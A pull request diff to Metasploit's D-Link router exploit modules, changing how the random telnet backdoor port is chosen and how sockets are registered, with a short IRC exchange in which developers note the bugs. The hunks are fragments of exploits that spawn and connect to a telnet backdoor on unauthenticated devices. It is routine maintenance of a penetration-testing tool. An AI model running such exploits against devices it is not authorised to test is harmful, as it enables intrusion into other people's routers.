### PR TITLE
Fix use of Rex sockets from dlink modules

### DIFF
--- a/modules/exploits/linux/http/dlink_command_php_exec_noauth.rb
+++ b/modules/exploits/linux/http/dlink_command_php_exec_noauth.rb
@@ -77,7 +77,7 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def exploit
-    telnetport = rand(65535)
+    telnetport = rand(32767) + 32768
 
     print_status("#{rhost}:#{rport} - Telnet port used: #{telnetport}")
 

--- a/modules/exploits/linux/http/dlink_command_php_exec_noauth.rb
+++ b/modules/exploits/linux/http/dlink_command_php_exec_noauth.rb
@@ -88,11 +88,14 @@ class Metasploit3 < Msf::Exploit::Remote
     request(cmd)
 
     print_status("#{rhost}:#{rport} - Trying to establish a telnet connection...")
-    sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnetport.to_i })
+    ctx = { 'Msf' => framework, 'MsfExploit' => self }
+    sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnetport.to_i, 'Context' => ctx })
 
     if sock.nil?
       fail_with(Exploit::Failure::Unreachable, "#{rhost}:#{rport} - Backdoor service has not been spawned!!!")
     end
+
+    add_socket(sock)
 
     print_status("#{rhost}:#{rport} - Trying to establish a telnet session...")
     prompt = negotiate_telnet(sock)

--- a/modules/exploits/linux/http/dlink_dir300_exec_telnet.rb
+++ b/modules/exploits/linux/http/dlink_dir300_exec_telnet.rb
@@ -139,11 +139,14 @@ class Metasploit3 < Msf::Exploit::Remote
     request(cmd)
 
     print_status("#{rhost}:#{rport} - Trying to establish a telnet connection...")
-    sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnetport.to_i })
+    ctx = { 'Msf' => framework, 'MsfExploit' => self }
+    sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnetport.to_i, 'Context' => ctx })
 
     if sock.nil?
       fail_with(Failure::Unreachable, "#{rhost}:#{rport} - Backdoor service has not been spawned!!!")
     end
+
+    add_socket(sock)
 
     print_status("#{rhost}:#{rport} - Trying to establish a telnet session...")
     prompt = negotiate_telnet(sock)

--- a/modules/exploits/linux/http/dlink_dir300_exec_telnet.rb
+++ b/modules/exploits/linux/http/dlink_dir300_exec_telnet.rb
@@ -129,7 +129,7 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def exploit_telnet
-    telnetport = rand(65535)
+    telnetport = rand(32767) + 32768
 
     print_status("#{rhost}:#{rport} - Telnetport: #{telnetport}")
 

--- a/modules/exploits/linux/http/dlink_upnp_exec_noauth_telnetd.rb
+++ b/modules/exploits/linux/http/dlink_upnp_exec_noauth_telnetd.rb
@@ -95,11 +95,14 @@ class Metasploit3 < Msf::Exploit::Remote
     end
 
     print_status("#{rhost}:#{rport} - Trying to establish a telnet connection...")
-    sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnetport.to_i })
+    ctx = { 'Msf' => framework, 'MsfExploit' => self }
+    sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnetport.to_i, 'Context' => ctx })
 
     if sock.nil?
       fail_with(Exploit::Failure::Unreachable, "#{rhost}:#{rport} - Backdoor service has not been spawned!!!")
     end
+
+    add_socket(sock)
 
     print_status("#{rhost}:#{rport} - Trying to establish a telnet session...")
     prompt = negotiate_telnet(sock)

--- a/modules/exploits/linux/http/dlink_upnp_exec_noauth_telnetd.rb
+++ b/modules/exploits/linux/http/dlink_upnp_exec_noauth_telnetd.rb
@@ -76,9 +76,9 @@ class Metasploit3 < Msf::Exploit::Remote
 
   def exploit
     @new_portmapping_descr = rand_text_alpha(8)
-    @new_external_port = rand(65535)
-    @new_internal_port = rand(65535)
-    telnetport = rand(65535)
+    @new_external_port = rand(32767) + 32768
+    @new_internal_port = rand(32767) + 32768
+    telnetport = rand(32767) + 32768
 
     vprint_status("#{rhost}:#{rport} - Telnetport: #{telnetport}")
 


### PR DESCRIPTION
Noticed by @hmoore-r7 and @jlee-r7

```
< hdm> missing Context in the socket creation too
< hdm> also, random means it could overlap with 80, 22, other used ports on the device
< egypt> also doesn't add_socket
```
